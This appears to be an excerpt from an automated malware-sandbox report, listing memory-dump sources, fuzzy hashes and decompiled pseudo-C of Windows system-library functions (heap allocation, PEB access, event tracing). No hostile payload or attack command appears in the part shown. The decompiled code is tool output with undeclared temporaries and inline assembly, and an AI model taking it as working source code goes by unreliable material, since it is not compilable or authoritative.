                                                                            0x01113798
                                                                            0x0111379b
                                                                            0x0111379b
                                                                            0x010b91a3
                                                                            0x010b91a9
                                                                            0x010b91b0
                                                                            0x010b91b4
                                                                            0x010b91b4
                                                                            0x010b91bb
                                                                            0x010b91c0
                                                                            0x010b91c5
                                                                            0x010b91c7
                                                                            0x011137da
                                                                            0x010b91cd
                                                                            0x010b91cd
                                                                            0x010b91cd
                                                                            0x010b91d2
                                                                            0x010b91d5
                                                                            0x010b9239
                                                                            0x010b9239
                                                                            0x010b91d7
                                                                            0x010b91db
                                                                            0x010b91e1
                                                                            0x010b91e7
                                                                            0x010b91fd
                                                                            0x010b9203
                                                                            0x010b921e
                                                                            0x010b9223
                                                                            0x00000000
                                                                            0x010b9223
                                                                            0x010b9205
                                                                            0x010b9208
                                                                            0x010b920c
                                                                            0x010b9214
                                                                            0x010b9214
                                                                            0x010b91e9
                                                                            0x010b91e9
                                                                            0x010b91ee
                                                                            0x010b91f3
                                                                            0x010b91f3
                                                                            0x010b91f3
                                                                            0x010b91e7
                                                                            0x00000000
                                                                            0x010b91db
                                                                            0x010b9187
                                                                            0x010b9168

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5ac3dbb573636c277abf9231b0b96c83cef6483f52fe7573771ea48e7b326011
                                                                            • Instruction ID: fa1806cebaa0a2967f81f0b2b3fe23ac05b38a09ea2938080924730f2452146d
                                                                            • Opcode Fuzzy Hash: 5ac3dbb573636c277abf9231b0b96c83cef6483f52fe7573771ea48e7b326011
                                                                            • Instruction Fuzzy Hash: 5931C3B5A01645DFEB6ADF6CC0C87ECBBF1BB49318F58859DC65467241C330A980DB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 60%
E010E1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
    char _v8;
    intOrPtr _v12;
    intOrPtr _v16;
    intOrPtr* _v20;
    void* _t22;
    char _t23;
    void* _t36;
    intOrPtr _t42;
    intOrPtr _t43;

    _v12 = __ecx;
    _t43 = 0;
    _v20 = __edx;
    _t42 = *__edx;
    *__edx = 0;
    _v16 = _t42;
    _push( &_v8);
    _push(0);
    _push(0);
    _push(6);
    _push(0);
    _push(__ecx);
    _t36 = ((0 | __ecx != *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
    _push(_t36);
    _t22 = E010DF460();
    if(_t22 < 0) {
        if(_t22 == 0xc0000023) {
            goto L1;
        }
        L3:
        return _t43;
    }
    L1:
    _t23 = _v8;
    if(_t23 != 0) {
        _t38 = _a4;
        if(_t23 > *_a4) {
            _t42 = L010D4620(_t38, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
            if(_t42 == 0) {
                goto L3;
            }
            _t23 = _v8;
        }
        _push( &_v8);
        _push(_t23);
        _push(_t42);
        _push(6);
        _push(_t43);
        _push(_v12);
        _push(_t36);
        if(E010DF460() < 0) {
            if(_t42 != 0 && _t42 != _v16) {
                L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
            }
            goto L3;
        }
        *_v20 = _t42;
        *_a4 = _v8;
    }
    _t43 = 1;
    goto L3;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                            • Instruction ID: 57366acaa606fd861147dea103d5a69675e93b9978f2df13b35c857feb9a7017
                                                                            • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                            • Instruction Fuzzy Hash: BD216D72600219EFD721CF9AC884EAABBF9EF89740F154095FA4597350D674AE11C7A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 53%
E010D0050(void* __ecx) {
    signed int _v8;
    void* __ebx;
    void* __edi;
    void* __esi;
    void* __ebp;
    intOrPtr* _t30;
    intOrPtr* _t31;
    signed int _t34;
    void* _t40;
    void* _t41;
    signed int _t44;
    intOrPtr _t47;
    signed int _t58;
    void* _t59;
    void* _t61;
    void* _t62;
    signed int _t64;

    _push(__ecx);
    _v8 = *0x11ad360 ^ _t64;
    _t61 = __ecx;
    _t2 = _t61 + 0x20; // 0x20
    E010E9ED0(_t2, 1, 0);
    _t52 = *(_t61 + 0x8c);
    _t4 = _t61 + 0x8c; // 0x8c
    _t40 = _t4;
    do {
        _t44 = _t52;
        _t58 = _t52 & 0x00000001;
        _t24 = _t44;
        asm("lock cmpxchg [ebx], edx");
        _t52 = _t44;
    } while (_t52 != _t44);
    if(_t58 == 0) {
        L7:
        _pop(_t59);
        _pop(_t62);
        _pop(_t41);
        return E010FB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
    }
    asm("lock xadd [esi], eax");
    _t47 = *[fs:0x18];
    *((intOrPtr*)(_t61 + 0x50)) = *((intOrPtr*)(_t47 + 0x19c));
    *((intOrPtr*)(_t61 + 0x54)) = *((intOrPtr*)(_t47 + 0x1a0));
    _t30 = *((intOrPtr*)( *[fs:0x30] + 0x50));
    if(_t30 != 0) {
        if( *_t30 == 0) {
            goto L4;
        }
        _t31 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
        L5:
        if( *_t31 != 0) {
            _t18 = _t61 + 0x78; // 0x78
            E01188A62( *(_t61 + 0x5c), _t18, *((intOrPtr*)(_t61 + 0x30)), *((intOrPtr*)(_t61 + 0x34)), *((intOrPtr*)(_t61 + 0x3c)));
        }
        _t52 = *(_t61 + 0x5c);
        _t11 = _t61 + 0x78; // 0x78
        _t34 = E010E9702(_t40, _t11, *(_t61 + 0x5c), *((intOrPtr*)(_t61 + 0x74)), 0);
        _t24 = _t34 | 0xffffffff;
        asm("lock xadd [esi], eax");
        if((_t34 | 0xffffffff) == 0) {
            *0x11ab1e0(_t61);
            _t24 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
        }
        goto L7;
    }
    L4:
    _t31 = 0x7ffe0386;
    goto L5;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 583be761f75afac3196713b7e73467e02cbdd219f5962318825d8fdeabf08321
                                                                            • Instruction ID: c2a37c54f8b47b08dbfa5007cd2bdd2335979244b71471b045a978d4bff75ad8
                                                                            • Opcode Fuzzy Hash: 583be761f75afac3196713b7e73467e02cbdd219f5962318825d8fdeabf08321
                                                                            • Instruction Fuzzy Hash: C731CE31201B04DFD726CF28C844B9ABBE5FF88714F1485ADF59A87B94EB75A801CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
E01136C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
    signed short* _v8;
    signed char _v12;
    void* _t22;
    signed char* _t23;
    intOrPtr _t24;
    signed short* _t44;
    void* _t47;
    signed char* _t56;
    signed char* _t58;

    _t48 = __ecx;
    _push(__ecx);
    _push(__ecx);
    _t44 = __ecx;
    _v12 = __edx;
    _v8 = __ecx;
    _t22 = E010D7D50();
    _t58 = 0x7ffe0384;
    if(_t22 == 0) {
        _t23 = 0x7ffe0384;
    } else {
        _t23 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
    }
    if( *_t23 != 0) {
        _t24 = *0x11a7b9c; // 0x0
        _t47 = ( *_t44 & 0x0000ffff) + 0x30;
        _t23 = L010D4620(_t48, *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
        _t56 = _t23;
        if(_t56 != 0) {
            _t56[0x24] = _a4;
            _t56[0x28] = _a8;
            _t56[6] = 0x1420;
            _t56[0x20] = _v12;
            _t14 = &(_t56[0x2c]); // 0x2c
            E010FF3E0(_t14, _v8[2], *_v8 & 0x0000ffff);
            _t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
            if(E010D7D50() != 0) {
                _t58 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
            }
            _push(_t56);
            _push(_t47 - 0x20);
            _push(0x402);
            _push( *_t58 & 0x000000ff);
            E010F9AE0();
            _t23 = L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
        }
    }
    return _t23;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6463785b85315868c5951abb28619f75e2112ed66bbd485bc002c2bf22cd9230
                                                                            • Instruction ID: fba9aedc7b73b2611a518dba2a79a4694096a0a0a6aed31455940a0d18d88bc8
                                                                            • Opcode Fuzzy Hash: 6463785b85315868c5951abb28619f75e2112ed66bbd485bc002c2bf22cd9230
                                                                            • Instruction Fuzzy Hash: E1219AB2A00645BBD715DB68D880F6AB7B8FF48704F140069F948C7B90D734EE10CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
E010F90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
    intOrPtr* _v0;
    void* _v8;
    signed int _v12;
    intOrPtr _v16;
    char _v36;
    void* _t38;
    intOrPtr _t41;
    void* _t44;
    signed int _t45;
    intOrPtr* _t49;
    signed int _t57;
    signed int _t58;
    intOrPtr* _t59;
    void* _t62;
    void* _t63;
    void* _t65;
    void* _t66;
    signed int _t69;
    intOrPtr* _t70;
    void* _t71;
    intOrPtr* _t72;
    intOrPtr* _t73;
    char _t74;

    _t65 = __edx;
    _t57 = _a4;
    _t32 = __ecx;
    _v8 = __edx;
    _t3 = _t32 + 0x14c; // 0x14c
    _t70 = _t3;
    _v16 = __ecx;
    _t72 = *_t70;
    while(_t72 != _t70) {
        if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
            L24:
            _t72 = *_t72;
            continue;
        }
        _t30 = _t72 + 0x10; // 0x10
        if(E0110D4F0(_t30, _t65, _t57) == _t57) {
            return 0xb7;
        }
        _t65 = _v8;
        goto L24;
    }
    _t61 = _t57;
    _push( &_v12);
    _t66 = 0x10;
    if(E010EE5E0(_t57, _t66) < 0) {
        return 0x216;
    }
    _t73 = L010D4620(_t61, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
    if(_t73 == 0) {
        _t38 = 0xe;
        return _t38;
    }
    _t9 = _t73 + 0x10; // 0x10
    *((intOrPtr*)(_t73 + 0xc)) = _t57;
    E010FF3E0(_t9, _v8, _t57);
    _t41 = *_t70;
    if( *((intOrPtr*)(_t41 + 4)) != _t70) {
        _t62 = 3;
        asm("int 0x29");
        _push(_t62);
        _push(_t57);
        _push(_t73);
        _push(_t70);
        _t71 = _t62;
        _t74 = 0;
        _v36 = 0;
        _t63 = E010EA2F0(_t62, _t71, 1, 6, &_v36);
        if(_t63 == 0) {
            L20:
            _t44 = 0x57;
            return _t44;
        }
        _t45 = _v12;
        _t58 = 0x1c;
        if(_t45 < _t58) {
            goto L20;
        }
        _t69 = _t45 / _t58;
        if(_t69 == 0) {
            L19:
            return 0xe8;
        }
        _t59 = _v0;
        do {
            if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                goto L18;
            }
            _t49 = *((intOrPtr*)(_t63 + 0x14)) + _t71;
            *_t59 = _t49;
            if( *_t49 != 0x53445352) {
                goto L18;
            }
            *_a4 = *((intOrPtr*)(_t63 + 0x10));
            return 0;
            L18:
            _t63 = _t63 + 0x1c;
            _t74 = _t74 + 1;
        } while (_t74 < _t69);
        goto L19;
    }
    *_t73 = _t41;
    *((intOrPtr*)(_t73 + 4)) = _t70;
    *((intOrPtr*)(_t41 + 4)) = _t73;
    *_t70 = _t73;
    *(_v16 + 0xdc) = *(_v16 + 0xdc) | 0x00000010;
    return 0;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                            • Instruction ID: 84537a1d460293eafe11aef0c693f20494bb3904bc8fc3a1c6cdfac6fd99cb33
                                                                            • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                            • Instruction Fuzzy Hash: B5217C71A00205EFDB21DF59C845EAAFBF8EB54314F14887EFA89A7611D370A9048B90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 59%
E010E3B7A(void* __ecx) {
    signed int _v8;
    char _v12;
    intOrPtr _v20;
    intOrPtr _t17;
    intOrPtr _t26;
    void* _t35;
    void* _t38;
    void* _t41;
    intOrPtr _t44;

    _t17 = *0x11a84c4; // 0x0
    _v12 = 1;
    _v8 = *0x11a84c0 * 0x4c;
    _t41 = __ecx;
    _t35 = L010D4620(__ecx, *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008, *0x11a84c0 * 0x4c);
    if(_t35 == 0) {
        _t44 = 0xc0000017;
    } else {
        _push( &_v8);
        _push(_v8);
        _push(_t35);
        _push(4);
        _push( &_v12);
        _push(0x6b);
        _t44 = E010FAA90();
        _v20 = _t44;
        if(_t44 >= 0) {
            E010FFA60( *((intOrPtr*)(_t41 + 0x20)), 0, *0x11a84c0 * 0xc);
            _t38 = _t35;
            if(_t35 < _v8 + _t35) {
                do {
                    asm("movsd");
                    asm("movsd");
                    asm("movsd");
                    _t38 = _t38 + *((intOrPtr*)(_t38 + 4));
                } while (_t38 < _v8 + _t35);
                _t44 = _v20;
            }
        }
        _t26 = *0x11a84c4; // 0x0
        L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
    }
    return _t44;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 33fb56a2fbe85f9b384ffab210be28408a4619c0b029d99b1bcbd98a6d8d6829
                                                                            • Instruction ID: 29cecc1e7216014da33f04adac3016eaf7e0595a4e993e4db0153bd1664d525e
                                                                            • Opcode Fuzzy Hash: 33fb56a2fbe85f9b384ffab210be28408a4619c0b029d99b1bcbd98a6d8d6829
                                                                            • Instruction Fuzzy Hash: 7B219FB2A00109AFC714DF58CD81BAABBBDFB44748F250068EA09AB251D371ED55CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 80%
E01136CF0(void* __edx, intOrPtr _a4, short _a8) {
    char _v8;
    char _v12;
    char _v16;
    char _v20;
    char _v28;
    char _v36;
    char _v52;
    void* __ebx;
    void* __edi;
    void* __esi;
    void* __ebp;
    signed char* _t21;
    void* _t24;
    void* _t36;
    void* _t38;
    void* _t46;

    _push(_t36);
    _t46 = __edx;
    _v12 = 0;
    _v8 = 0;
    _v20 = 0;
    _v16 = 0;
    if(E010D7D50() == 0) {
        _t21 = 0x7ffe0384;
    } else {
        _t21 = ( *[fs:0x30])[0x50] + 0x22a;
    }
    if( *_t21 != 0) {
        _t21 = *[fs:0x30];
        if((_t21[0x240] & 0x00000004) != 0) {
            if(E010D7D50() == 0) {
                _t21 = 0x7ffe0385;
            } else {
                _t21 = ( *[fs:0x30])[0x50] + 0x22b;
            }
            if(( *_t21 & 0x00000020) != 0) {
                _t56 = _t46;
                if(_t46 == 0) {
                    _t46 = 0x1095c80;
                }
                _push(_t46);
                _push( &_v12);
                _t24 = E010EF6E0(_t36, 0, _t46, _t56);
                _push(_a4);
                _t38 = _t24;
                _push( &_v28);
                _t21 = E010EF6E0(_t38, 0, _t46, _t56);
                if(_t38 != 0) {
                    if(_t21 != 0) {
                        E01137016(_a8, 0, 0, 0, &_v36, &_v28);
                        L010D2400( &_v52);
                    }
                    _t21 = L010D2400( &_v28);
                }
            }
        }
    }
    return _t21;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0f2e19d5ba10ad4a0f450c2ed6110eb3f74a2c2c41bb57a534abf184889bbf04
                                                                            • Instruction ID: 4691b8c5faacd565a5c2abae760953b65fb60d3ffd553e0e624936aacd311f16
                                                                            • Opcode Fuzzy Hash: 0f2e19d5ba10ad4a0f450c2ed6110eb3f74a2c2c41bb57a534abf184889bbf04
                                                                            • Instruction Fuzzy Hash: 7A21F272500346AFDB15EF29D948BABBBECAFD1650F040556FAC0C7255EB34CA48C6A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
E0118070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
    char _v8;
    intOrPtr _v11;
    signed int _v12;
    intOrPtr _v15;
    signed int _v16;
    intOrPtr _v28;
    void* __ebx;
    char* _t32;
    signed int* _t38;
    signed int _t60;

    _t38 = __ecx;
    _v16 = __edx;
    _t60 = E011807DF(__ecx, __edx, &_a4, &_a8, 2);
    if(_t60 != 0) {
        _t7 = _t38 + 0x38; // 0x29cd5903
        _push( *_t7);
        _t9 = _t38 + 0x34; // 0x6adeeb00
        _push( *_t9);
        _v12 = _a8 << 0xc;
        _t11 = _t38 + 4; // 0x5de58b5b
        _push(0x4000);
        _v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 << *_t11) + ( *__ecx & _v16);
        E0117AFDE( &_v8, &_v12);
        E01181293(_t38, _v28, _t60);
        if(E010D7D50() == 0) {
            _t32 = 0x7ffe0380;
        } else {
            _t32 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
        }
        if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
            _t21 = _t38 + 0x3c; // 0xc3595e5f
            E011714FB(_t38, *_t21, _v11, _v15, 0xd);
        }
    }
    return ~_t60;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
                                                                                                                                  E01137794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) { 				intOrPtr _v8; 				intOrPtr _v12; 				intOrPtr _t21; 				void* _t24; 				intOrPtr _t25; 				void* _t36; 				short _t39; 				signed char* _t42; 				unsigned int _t46; 				void* _t50;  				_push(__ecx); 				_push(__ecx); 				_t21 =  *0x11a7b9c; // 0x0 				_t46 = _a8; 				_v12 = __edx; 				_v8 = __ecx; 				_t4 = _t46 + 0x2e; // 0x2e 				_t36 = _t4; 				_t24 = L010D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36); 				_t50 = _t24; 				if(_t50 != 0) { 					_t25 = _a4; 					if(_t25 == 5) { 						L3: 						_t39 = 0x14b1; 					} else { 						_t39 = 0x14b0; 						if(_t25 == 6) { 							goto L3; 						} 					} 					 *((short*)(_t50 + 6)) = _t39; 					 *((intOrPtr*)(_t50 + 0x28)) = _t25; 					_t11 = _t50 + 0x2c; // 0x2c 					 *((intOrPtr*)(_t50 + 0x20)) = _v8; 					 *((intOrPtr*)(_t50 + 0x24)) = _v12; 					E010FF3E0(_t11, _a12, _t46); 					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0; 					if(E010D7D50() == 0) { 						_t42 = 0x7ffe0384; 					} else { 						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; 					} 					_push(_t50); 					_t19 = _t36 - 0x20; // 0xe 					_push(0x403); 					_push( *_t42 & 0x000000ff); 					E010F9AE0(); 					_t24 = L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50); 				} 				return _t24; 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 96%
                                                                                                                                  E010DAE73(intOrPtr __ecx, void* __edx) { 				intOrPtr _v8; 				void* _t19; 				char* _t22; 				signed char* _t24; 				intOrPtr _t25; 				intOrPtr _t27; 				void* _t31; 				intOrPtr _t36; 				char* _t38; 				signed char* _t42;  				_push(__ecx); 				_t31 = __edx; 				_v8 = __ecx; 				_t19 = E010D7D50(); 				_t38 = 0x7ffe0384; 				if(_t19 != 0) { 					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a; 				} else { 					_t22 = 0x7ffe0384; 				} 				_t42 = 0x7ffe0385; 				if( *_t22 != 0) { 					if(E010D7D50() == 0) { 						_t24 = 0x7ffe0385; 					} else { 						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b; 					} 					if(( *_t24 & 0x00000010) != 0) { 						goto L17; 					} else { 						goto L3; 					} 				} else { 					L3: 					_t27 = E010D7D50(); 					if(_t27 != 0) { 						_t27 =  *[fs:0x30]; 						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a; 					} 					if( *_t38 != 0) { 						_t27 =  *[fs:0x30]; 						if(( *(_t27 + 0x240) & 0x00000004) == 0) { 							goto L5; 						} 						_t27 = E010D7D50(); 						if(_t27 != 0) { 							_t27 =  *[fs:0x30]; 							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b; 						} 						if(( *_t42 & 0x00000020) != 0) { 							L17: 							_t25 = _v8; 							_t36 = 0; 							if(_t25 != 0) { 								_t36 =  *((intOrPtr*)(_t25 + 0x18)); 							} 							_t27 = E01137794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28))); 						} 						goto L5; 					} else { 						L5: 						return _t27; 					} 				} 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
                                                                                                                                  E010EFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) { 				intOrPtr _v8; 				void* _t19; 				intOrPtr _t29; 				intOrPtr _t32; 				intOrPtr _t35; 				intOrPtr _t37; 				intOrPtr* _t40;  				_t35 = __edx; 				_push(__ecx); 				_push(__ecx); 				_t37 = 0; 				_v8 = __edx; 				_t29 = __ecx; 				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) { 					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc)); 					L3: 					_t19 = _a4 - 4; 					if(_t19 != 0) { 						if(_t19 != 1) { 							L7: 							return _t37; 						} 						if(_t35 == 0) { 							L11: 							_t37 = 0xc000000d; 							goto L7; 						} 						if( *((intOrPtr*)(_t40 + 4)) != _t37) { 							L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4))); 							_t35 = _v8; 						} 						 *((intOrPtr*)(_t40 + 4)) = _t35; 						goto L7; 					} 					if(_t29 == 0) { 						goto L11; 					} 					_t32 =  *_t40; 					if(_t32 != 0) { 						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20)); 						E010C76E2( *_t40); 					} 					 *_t40 = _t29; 					goto L7; 				} 				_t40 = L010D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8); 				if(_t40 == 0) { 					_t37 = 0xc0000017; 					goto L7; 				} 				_t35 = _v8; 				 *_t40 = 0; 				 *((intOrPtr*)(_t40 + 4)) = 0; 				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40; 				goto L3; 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 54%
                                                                                                                                  E010EB390(void* __ecx, intOrPtr _a4) { 				signed int _v8; 				signed char _t12; 				signed int _t16; 				signed int _t21; 				void* _t28; 				signed int _t30; 				signed int _t36; 				signed int _t41;  				_push(__ecx); 				_t41 = _a4 + 0xffffffb8; 				E010D2280(_t12, 0x11a8608); 				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1; 				asm("sbb edi, edi"); 				_t36 =  !( ~( *(_t41 + 0x34))) & _t41; 				_v8 = _t36; 				asm("lock cmpxchg [ebx], ecx"); 				_t30 = 1; 				if(1 != 1) { 					while(1) { 						_t21 = _t30 & 0x00000006; 						_t16 = _t30; 						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30; 						asm("lock cmpxchg [edi], esi"); 						if(_t16 == _t30) { 							break; 						} 						_t30 = _t16; 					} 					_t36 = _v8; 					if(_t21 == 2) { 						_t16 = E010F00C2(0x11a8608, 0, _t28); 					} 				} 				if(_t36 != 0) { 					_t16 = L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36); 				} 				return _t16; 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
